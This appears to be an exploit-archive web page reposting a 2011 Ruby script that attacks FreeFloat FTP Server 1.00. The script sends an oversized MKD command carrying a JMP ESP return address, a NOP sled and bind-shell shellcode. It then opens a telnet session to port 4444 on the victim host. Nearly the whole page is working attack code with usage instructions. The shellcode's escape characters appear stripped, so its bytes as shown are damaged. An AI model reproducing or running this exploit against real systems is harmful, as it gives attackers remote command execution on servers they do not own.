Home / exploits FreeFloat FTP Server 1.00 MKD Buffer Overflow
Posted on 17 July 2011
#!/usr/bin/ruby # #[+]Exploit Title: FreeFloat FTP Server MKD Buffer Overflow Exploit #[+]Date: 16�62011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.freefloat.com/software/freefloatftpserver.zip #[+]Version: 1.00 #[+]Tested On: Windows XP SP3 Brazilian #[+]CVE: N/A # # require 'socket' def banner() print """ ================================================================= ================================================================= ==========FreeFloat FTP Server MKD Buffer Overflow Exploit======= ==========Autor C4SS!0 G0M3S===================================== ==========E-mail louredo_@hotmail.com============================ ================================================================= ================================================================= """ end def exploit(buf,ip,porta) begin s = TCPSocket.new(ip,porta.to_i) s.recv(20000) s.puts "USER test " s.recv(2000) s.puts "PASS test " s.recv(2000) s.puts "MKD #{buf} " s.close s = TCPSocket.new(ip,porta) sleep(1) s.close rescue print " [*]Error: #{$!} " exit(0) end end sys = `ver` if sys=~/Windows/ system("cls") system("color 4f") system("title FreeFloat FTP Server MKD Buffer Overflow Exploit") else system("clear") end if not ARGV[1] banner() print " [-]Usage: ruby #{$0} <Host> <Port> " print " [-]Exemple: ruby #{$0} 192.168.1.2 21 " exit(0) end banner() host = ARGV[0] porta = ARGV[1].to_i print " [+]Connecting to Server "+host+"... " sleep(1) begin sock = TCPSocket.new(host,porta) print " [+]Checking if server is vulnerable " sleep(1) c = sock.recv(2000) rescue print " [*]Error:#{$!} " exit(0) end unless c =~/FreeFloat Ftp Server (Version 1.00)/ print " [+]Server Not Vulnerable:( " sleep(1) exit(0) end sock.close print " [+]Server Vulnerable:) " sleep(1) print " [+]Running Buffer Overflow Attacks " sleep(1) shellcode = "x33xc9x83xe9xaaxe8xffxffxffxffxc0x5ex81x76x0e"+ "xbbxc1x9cx35x83xeexfcxe2xf4x47x29x15x35xbbxc1"+ "xfcxbcx5exf0x4ex51x30x93xacxbexe9xcdx17x67xaf"+ "x4axeex1dxb4x76xd6x13x8ax3exadxf5x17xfdxfdx49"+ "xb9xedxbcxf4x74xccx9dxf2x59x31xcex62x30x93x8c"+ "xbexf9xfdx9dxe5x30x81xe4xb0x7bxb5xd6x34x6bx91"+ "x17x7dxa3x4axc4x15xbax12x7fx09xf2x4axa8xbexba"+ "x17xadxcax8ax01x30xf4x74xccx9dxf2x83x21xe9xc1"+ "xb8xbcx64x0exc6xe5xe9xd7xe3x4axc4x11xbax12xfa"+#Shellcode Bing Shell LPORT=4444 "xbexb7x8ax17x6dxa7xc0x4fxbexbfx4ax9dxe5x32x85"+ "xb8x11xe0x9axfdx6cxe1x90x63xd5xe3x9exc6xbexa9"+ "x2ax1ax68xd3xf2xaex35xbbxa9xebx46x89x9exc8x5d"+ "xf7xb6xbax32x44x14x24xa5xbaxc1x9cx1cx7fx95xcc"+ "x5dx92x41xf7x35x44x14xccx65xebx91xdcx65xfbx91"+ "xf4xdfxb4x1ex7cxcax6ex48x5bx04x60x92xf4x37xbb"+ "xd0xc0xbcx5dxabx8cx63xecxa9x5exeex8cxa6x63xe0"+ "xe8x96xf4x82x52xf9x63xcax6ex92xcfx62xd3xb5x70"+ "x0ex5ax3ex49x62x32x06xf4x40xd5x8cxfdxcax6exa9"+ "xffx58xdfxc1x15xd6xecx96xcbx04x4dxabx8ex6cxed"+ "x23x61x53x7cx85xb8x09xbaxc0x11x71x9fxd1x5ax35"+ "xffx95xccx63xedx97xdax63xf5x97xcax66xedxa9xe5"+ "xf9x84x47x63xe0x32x21xd2x63xfdx3exacx5dxb3x46"+ "x81x55x44x14x27xc5x0ex63xcax5dx1dx54x21xa8x44"+ "x14xa0x33xc7xcbx1cxcex5bxb4x99x8exfcxd2xeex5a"+ "xd1xc1xcfxcax6exc1x9cx35" buf = "x41" * 247 buf += [0x7C874413].pack('V')#JMP ESP IN kernel32.dll buf += "x90" * 20#nopled buf += shellcode buf += "x41" * (1000-buf.length) exploit(buf,host,porta) print " [+]Attack Buffer Overflow Successfully Executed " sleep(1) print " [+]Running telnet command: "telnet #{host} 4444" " sleep(2) system("telnet #{host} 4444")
